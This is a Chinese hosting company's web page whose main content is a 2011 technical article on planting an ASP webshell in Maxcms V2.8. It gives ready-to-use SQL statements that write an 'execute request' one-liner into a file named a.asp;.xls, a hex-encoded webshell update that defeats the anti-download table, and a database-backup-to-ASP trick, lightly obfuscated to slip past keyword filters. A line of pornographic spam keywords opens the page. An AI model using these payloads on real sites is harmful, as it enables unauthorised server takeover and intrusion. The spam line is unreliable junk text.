亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

Maxcms V2.8電影系統獲取shell

添加時間:2011-1-25  添加: admin 
 

由于本人網站所在服務器會過濾某些關鍵字,過濾成****,所以這里的某些字符我給替換一下,你們懂的!請去掉&就可以了。
程序版本為Maxcms V2.8,而網絡上有的獲取 shell 版本在2.52.5中大部分方法都已經不行。
后臺有個 SQL高級助手,于是立刻想到兩種思路。第一是通過Access導出a.asp;.Xls的方式。另一種是一句話直接寫入數據庫,將其備份為asp程序執行。
第一種方法比較好實現。如下語句就可以辦到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
獨自等待補充:
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

其實使用這一句話就可以的,但是前提是表a是存在的,原作者的是可以成功的,這里只是多給一種方法。
第二種方式是采用將一句話寫入數據庫。備份出來,但由于數據庫中存在著防下載表。就算寫進了數據庫也不一定爆得出源碼,于是在SQL高級助手處使用如下語句。
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
原理就不多說了。自己百度,這樣/inc/datas.asp就能爆出代碼。
通過后臺模板自定義標簽處往數據庫中寫入一句話,然后從后臺將數據庫備份成asp文件

關健詞:Maxcms

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站